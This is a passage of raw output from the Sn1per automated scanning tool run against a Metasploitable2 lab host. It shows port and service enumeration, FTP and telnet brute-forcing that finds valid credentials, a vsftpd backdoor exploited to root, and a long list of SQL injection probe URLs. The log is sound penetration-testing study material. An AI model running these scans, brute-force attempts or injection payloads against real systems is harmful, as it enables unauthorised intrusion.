____ _________ / _/___ ___ _____ / ___/ __ \ / // __ \/ _ \/ ___/ (__ ) / / // // /_/ / __/ / /____/_/ /_/___/ .___/\___/_/ /_/ + -- --=[http://crowdshield.com + -- --=[sn1per v1.3 by 1N3 ################################### Running recon ################################# ;; connection timed out; no servers could be reached Host 113.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN) ; <<>> DiG 9.9.5-9+deb8u2-Debian <<>> -x 192.168.1.113 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 10662 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;113.1.168.192.in-addr.arpa. IN PTR ;; AUTHORITY SECTION: 168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800 ;; Query time: 19 msec ;; SERVER: 206.248.154.22#53(206.248.154.22) ;; WHEN: Sun Sep 06 17:06:03 EDT 2015 ;; MSG SIZE rcvd: 114 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html # # If you see inaccuracies in the results, please report at # http://www.arin.net/public/whoisinaccuracy/index.xhtml # # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=192.168.1.113?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2 # NetRange: 192.168.0.0 - 192.168.255.255 CIDR: 192.168.0.0/16 NetName: PRIVATE-ADDRESS-CBLK-RFC1918-IANA-RESERVED NetHandle: NET-192-168-0-0-1 Parent: NET192 (NET-192-0-0-0-0) NetType: IANA Special Use OriginAS: Organization: Internet Assigned Numbers Authority (IANA) RegDate: 1994-03-15 Updated: 2013-08-30 Comment: These addresses are in use by many millions of independently operated networks, which might be as small as a single computer connected to a home gateway, and are automatically configured in hundreds of millions of devices. They are only intended for use within a private context and traffic that needs to cross the Internet will need to use a different, unique address. Comment: Comment: These addresses can be used by anyone without any need to coordinate with IANA or an Internet registry. The traffic from these addresses does not come from ICANN or IANA. We are not the source of activity you may see on logs or in e-mail records. Please refer to http://www.iana.org/abuse/answers Comment: Comment: These addresses were assigned by the IETF, the organization that develops Internet protocols, in the Best Current Practice document, RFC 1918 which can be found at: Comment: http://datatracker.ietf.org/doc/rfc1918 Ref: http://whois.arin.net/rest/net/NET-192-168-0-0-1 OrgName: Internet Assigned Numbers Authority OrgId: IANA Address: 12025 Waterfront Drive Address: Suite 300 City: Los Angeles StateProv: CA PostalCode: 90292 Country: US RegDate: Updated: 2012-08-31 Ref: http://whois.arin.net/rest/org/IANA OrgTechHandle: IANA-IP-ARIN OrgTechName: ICANN OrgTechPhone: +1-310-301-5820 OrgTechEmail: abuse@iana.org OrgTechRef: http://whois.arin.net/rest/poc/IANA-IP-ARIN OrgAbuseHandle: IANA-IP-ARIN OrgAbuseName: ICANN OrgAbusePhone: +1-310-301-5820 OrgAbuseEmail: abuse@iana.org OrgAbuseRef: http://whois.arin.net/rest/poc/IANA-IP-ARIN # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html # # If you see inaccuracies in the results, please report at # http://www.arin.net/public/whoisinaccuracy/index.xhtml # ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * TheHarvester Ver. 2.6 * * Coded by Christian Martorella * * Edge-Security Research * * cmartorella@edge-security.com * ******************************************************************* [-] Searching in Google: Searching 0 results... Searching 100 results... [+] Emails found: ------------------ 1010@192.168.1.113 455264881@192.168.1.113 isaacschneider@192.168.1.113 password@192.168.1.113 58054@192.168.1.113 58055@192.168.1.113 @192.168.1.113 gast@192.168.1.113 k8.bin@192.168.1.113 repl@192.168.1.113 root@192.168.1.113 [+] Hosts found in search engines: ------------------------------------ [-] Resolving hostnames IPs... ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * TheHarvester Ver. 2.6 * * Coded by Christian Martorella * * Edge-Security Research * * cmartorella@edge-security.com * ******************************************************************* [-] Searching in Bing: Searching 50 results... Searching 100 results... [+] Emails found: ------------------ @192.168.1.113 [+] Hosts found in search engines: ------------------------------------ [-] Resolving hostnames IPs... ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * TheHarvester Ver. 2.6 * * Coded by Christian Martorella * * Edge-Security Research * * cmartorella@edge-security.com * ******************************************************************* [-] Searching in Linkedin.. Searching 100 results.. Users from Linkedin: ==================== ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * TheHarvester Ver. 2.6 * * Coded by Christian Martorella * * Edge-Security Research * * cmartorella@edge-security.com * ******************************************************************* [-] Searching in 123People.. Searching 0 results... Searching 100 results... Users from 123People: ===================== [+] Emails found: ------------------ No emails found [+] Hosts found in search engines: ------------------------------------ dnsenum.pl VERSION:1.2.3 ----- 192.168.1.113 ----- Host's addresses: __________________ Name Servers: ______________ 192.168.1.113 NS record query failed: NXDOMAIN Error: no name server (NS) entry for domain 192.168.1.113. exists + -- --=[Checking for SPF records on 192.168.1.113... ################################### Pinging host ################################### PING 192.168.1.113 (192.168.1.113) 56(84) bytes of data. 64 bytes from 192.168.1.113: icmp_seq=1 ttl=64 time=0.414 ms --- 192.168.1.113 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.414/0.414/0.414/0.000 ms ################################### Running port scan ############################## Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:06 EDT Nmap scan report for 192.168.1.113 Host is up (0.00044s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45 |_Not valid after: 2010-04-16T14:07:45 |_ssl-date: 2015-09-05T12:13:03+00:00; -1d08h53m38s from scanner time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 43932/tcp mountd | 100005 1,2,3 58097/udp mountd | 100021 1,3,4 39515/udp nlockmgr | 100021 1,3,4 41962/tcp nlockmgr | 100024 1 38115/udp status |_ 100024 1 43758/tcp status 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 43932/tcp mountd | 100005 1,2,3 58097/udp mountd | 100021 1,3,4 39515/udp nlockmgr | 100021 1,3,4 41962/tcp nlockmgr | 100024 1 38115/udp status |_ 100024 1 43758/tcp status 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 100465 | Capabilities flags: 43564 | Some Capabilities: SupportsTransactions, LongColumnFlag, SupportsCompression, ConnectWithDatabase, Support41Auth, Speaks41ProtocolNew, SwitchToSSLAfterHandshake | Status: Autocommit |_ Salt: .iHhWW23JWY9Ph9"?Ti3 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 3 days, 21:01:56 | source ident: nmap | source host: C4A81015.78DED367.FFFA6D49.IP |_ error: Closing Link: nwqhmpvop[192.168.1.111] (Quit: nwqhmpvop) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 00:0C:29:0E:B0:99 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2015-09-05T08:13:01-04:00 TRACEROUTE HOP RTT ADDRESS 1 0.44 ms 192.168.1.113 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.83 seconds ################################### Running Intrusive Scans ######################## + -- --=[Port 21 opened... running tests... Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:06 EDT Nmap scan report for 192.168.1.113 Host is up (0.00033s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-brute: | Accounts: | user:user - Valid credentials |_ Statistics: Performed 1951 guesses in 602 seconds, average tps: 3 | ftp-vsftpd-backdoor: | VULNERABLE: | vsFTPd version 2.3.4 backdoor | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2011-2523 OSVDB:73573 | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | Disclosure date: 2011-07-03 | Exploit results: | Shell command: id | Results: uid=0(root) gid=0(root) | References: | http://osvdb.org/73573 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb MAC Address: 00:0C:29:0E:B0:99 (VMware) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 603.82 seconds + -- --=[Port 22 opened... running tests... Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:16 EDT Nmap scan report for 192.168.1.113 Host is up (0.00018s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) MAC Address: 00:0C:29:0E:B0:99 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds + -- --=[Port 23 opened... running tests... Using config file torch.conf... Loading include and plugin ... ############################################################### # Cisco Torch Mass Scanner # # Becase we need it... # # http://www.arhont.com/cisco-torch.pl # ############################################################### List of targets contains 1 host(s) 15268: Checking 192.168.1.113 ... HUH db not found, it should be in fingerprint.db Skipping Telnet fingerprint *** Found TFTP server HUH db not found, it should be in tfingerprint.db Skipping tftp fingerprint ---> - All scans done. Cisco Torch Mass Scanner - ---> Exiting. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:17 EDT Nmap scan report for 192.168.1.113 Host is up (0.0021s latency). PORT STATE SERVICE VERSION 23/tcp open telnet Linux telnetd | telnet-brute: | Accounts: | user:user - Valid credentials |_ Statistics: Performed 2069 guesses in 603 seconds, average tps: 3 | telnet-encryption: |_ Telnet server does not support encryption MAC Address: 00:0C:29:0E:B0:99 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 604.67 seconds + -- --=[Port 25 opened... running tests... Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT Nmap scan report for 192.168.1.113 Host is up (0.00052s latency). PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd | smtp-brute: |_ ERROR: Failed to retrieve authentication mechanisms form server |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | smtp-enum-users: |_ Method RCPT returned a unhandled status code. |_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed | smtp-vuln-cve2010-4344: |_ The SMTP server is not Exim: NOT VULNERABLE MAC Address: 00:0C:29:0E:B0:99 (VMware) Service Info: Host: metasploitable.localdomain Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds ERROR: Can't open username file BruteX/simple-users.txt: No such file or directory + -- --=[Port 53 opened... running tests... Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT Nmap scan report for 192.168.1.113 Host is up (0.0016s latency). PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd MAC Address: 00:0C:29:0E:B0:99 (VMware) Service Info: Host: metasploitable.localdomain Host script results: |_dns-brute: Can't guess domain of "192.168.1.113"; use dns-brute.domain script argument. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.75 seconds + -- --=[Port 80 opened... running tests... console.error: [CustomizableUI] Custom widget with id loop-button does not return a valid node Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT Nmap scan report for 192.168.1.113 Host is up (0.00032s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.113 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.1.113/twiki/TWikiDocumentation.html | Form id: | Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome | | Path: http://192.168.1.113/twiki/TWikiDocumentation.html | Form id: | Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome | | Path: http://192.168.1.113/twiki/TWikiDocumentation.html | Form id: | Form action: http://TWiki.org/cgi-bin/edit/TWiki/ | | Path: http://192.168.1.113/twiki/TWikiDocumentation.html | Form id: | Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins | | Path: http://192.168.1.113/twiki/TWikiDocumentation.html | Form id: | Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs | | Path: http://192.168.1.113/mutillidae/./index.php?page=register.php | Form id: id-bad-cred-tr |_ Form action: index.php?page=register.php |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-drupal-modules: | http-email-harvest: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.113 | webmaster@your.comp | name@domain.com | secondary@home.com | SomeWikiName@somewhere.test | a@z.com | Peter@Thoeny.com |_ you@yourdomain.com | http-enum: | /tikiwiki/: Tikiwiki | /test/: Test page | /phpinfo.php: Possible information file | /phpMyAdmin/: phpMyAdmin | /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2' | /icons/: Potentially interesting folder w/ directory listing |_ /index/: Potentially interesting folder |_http-feed: Couldn't find any feeds. |_http-frontpage-login: false | http-headers: | Date: Sat, 05 Sep 2015 12:34:28 GMT | Server: Apache/2.2.8 (Ubuntu) DAV/2 | X-Powered-By: PHP/5.2.4-2ubuntu5.10 | Connection: close | Content-Type: text/html | |_ (Request type: HEAD) |_http-iis-webdav-vuln: ERROR: This web server is not supported. |_http-methods: No Allow or Public header in OPTIONS response (status code 200) | http-php-version: Versions from logo query (less accurate): 5.1.3 - 5.1.6, 5.2.0 - 5.2.17 | Versions from credits query (more accurate): 5.2.3 - 5.2.5 |_Version from header x-powered-by: PHP/5.2.4-2ubuntu5.10 |_http-referer-checker: Couldn't find any cross-domain scripts. |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 | http-sql-injection: | Possible sqli for queries: | http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=N%3bO%3dD%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dhints%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dsecurity%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=php%2derrors%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=usage%2dinstructions%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=notes%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=D%3bO%3dD%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=S%3bO%3dD%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | http://192.168.1.113/dav/?C=M%3bO%3dD%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=home%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=framing%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=user%2dinfo%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=show%2dlog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=register%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=login%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/././index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | 